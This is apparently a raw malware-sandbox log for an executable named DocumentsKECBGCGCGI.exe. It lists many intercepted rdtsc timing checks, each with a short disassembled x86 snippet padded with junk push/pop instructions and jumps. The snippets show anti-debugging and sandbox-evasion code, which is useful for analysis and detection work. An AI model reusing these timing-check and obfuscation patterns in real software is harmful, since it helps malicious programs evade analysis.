Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 811962 second address: 8119B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b jmp 00007F626C9C9A36h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [eax] 0x00000013 jp 00007F626C9C9A33h 0x00000019 jmp 00007F626C9C9A2Dh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 jmp 00007F626C9C9A33h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 822834 second address: 82283A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 82283A second address: 82284D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F626C9C9A26h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830A14 second address: 830A2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830A2F second address: 830A39 instructions: 0x00000000 rdtsc 0x00000002 je 00007F626C9C9A3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830B94 second address: 830B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830B98 second address: 830B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830B9C second address: 830BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F626D6E9A66h 0x0000000e jl 00007F626D6E9A66h 0x00000014 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830D39 second address: 830D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830D3F second address: 830D49 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F626D6E9A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830D49 second address: 830D67 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F626C9C9A32h 0x00000008 push ebx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 830D67 second address: 830D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F626D6E9A6Eh 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83108E second address: 831092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 831092 second address: 8310C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A77h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F626D6E9A72h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8310C1 second address: 8310CF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F626C9C9A28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8310CF second address: 8310EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F626D6E9A72h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83126D second address: 831271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 831271 second address: 831282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 831282 second address: 8312B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F626C9C9A37h 0x0000000e jmp 00007F626C9C9A2Eh 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8312B0 second address: 8312CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F626D6E9A6Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 828BDA second address: 828BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 828BE2 second address: 828BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 828BE6 second address: 828BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 831E6C second address: 831E71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 831E71 second address: 831E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edi 0x00000008 jmp 00007F626C9C9A33h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83219E second address: 8321A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8321A2 second address: 8321B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jne 00007F626C9C9A26h 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8321B2 second address: 8321BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8375EB second address: 8375F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8375F6 second address: 837600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 839A48 second address: 839A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jg 00007F626C9C9A26h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 839C88 second address: 839C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 839C8C second address: 839CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626C9C9A34h 0x00000012 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 839CAD second address: 839CD1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F626D6E9A6Ch 0x00000008 jl 00007F626D6E9A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F626D6E9A6Ch 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 839CD1 second address: 839CD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83F1CD second address: 83F1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83E740 second address: 83E744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83E744 second address: 83E748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83E748 second address: 83E74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83E74E second address: 83E754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83ED78 second address: 83ED7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83ED7E second address: 83EDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F626D6E9A79h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83EEED second address: 83EF0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83EF0C second address: 83EF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 83EF10 second address: 83EF1A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F626C9C9A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 80833A second address: 80833E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 841E30 second address: 841E3A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F626C9C9A26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8425E0 second address: 8425E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 842AB9 second address: 842AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jng 00007F626C9C9A34h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 842D97 second address: 842D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84317C second address: 843180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 843180 second address: 84319B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84320A second address: 843223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8432D3 second address: 8432D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8432D9 second address: 8432E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8445C3 second address: 8445CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8445CE second address: 8445D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8478B8 second address: 8478BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 848404 second address: 84840A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84840A second address: 848436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jc 00007F626D6E9A68h 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 848436 second address: 84849A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F626C9C9A28h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, 48CE3E72h 0x0000002c push 00000000h 0x0000002e or dword ptr [ebp+122D21F9h], edi 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007F626C9C9A38h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 847681 second address: 847694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F626D6E9A66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 847694 second address: 84769A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 848EF0 second address: 848F42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F626D6E9A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F626D6E9A68h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jno 00007F626D6E9A73h 0x0000002d push 00000000h 0x0000002f movsx esi, cx 0x00000032 xor dword ptr [ebp+122D2E4Eh], ecx 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 848F42 second address: 848F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84CEAB second address: 84CEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84CEAF second address: 84CEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84CEB5 second address: 84CED4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626D6E9A75h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84CED4 second address: 84CEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F626C9C9A26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84D6C7 second address: 84D6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 850387 second address: 85038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84E733 second address: 84E739 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84E739 second address: 84E743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F626C9C9A26h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84E743 second address: 84E7BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c sub dword ptr [ebp+12458183h], esi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov edi, dword ptr [ebp+122D1EE3h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F626D6E9A68h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 mov eax, dword ptr [ebp+122D1345h] 0x00000046 call 00007F626D6E9A6Ch 0x0000004b xor dword ptr [ebp+122D2E67h], edi 0x00000051 pop edi 0x00000052 push FFFFFFFFh 0x00000054 sub dword ptr [ebp+122D1EF7h], edx 0x0000005a nop 0x0000005b pushad 0x0000005c jno 00007F626D6E9A68h 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007F626D6E9A66h 0x0000006a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84E7BE second address: 84E7C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 84E7C2 second address: 84E7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jnc 00007F626D6E9A6Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8513BD second address: 8513C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F626C9C9A26h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 853092 second address: 85309B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85309B second address: 85309F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8522E8 second address: 8522EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8522EC second address: 8522F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 855154 second address: 8551C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F626D6E9A66h 0x00000009 jmp 00007F626D6E9A6Fh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F626D6E9A68h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov bl, 02h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F626D6E9A68h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jns 00007F626D6E9A6Ch 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D2146h], esi 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8532E9 second address: 8532ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8532ED second address: 853311 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F626D6E9A76h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 853311 second address: 85331B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F626C9C9A26h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85821D second address: 85824B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A78h 0x00000007 jmp 00007F626D6E9A72h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 85824B second address: 858264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F626C9C9A2Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jng 00007F626C9C9A2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8068DA second address: 8068E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	RDTSC instruction interceptor: First address: 8068E3 second address: 8068E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
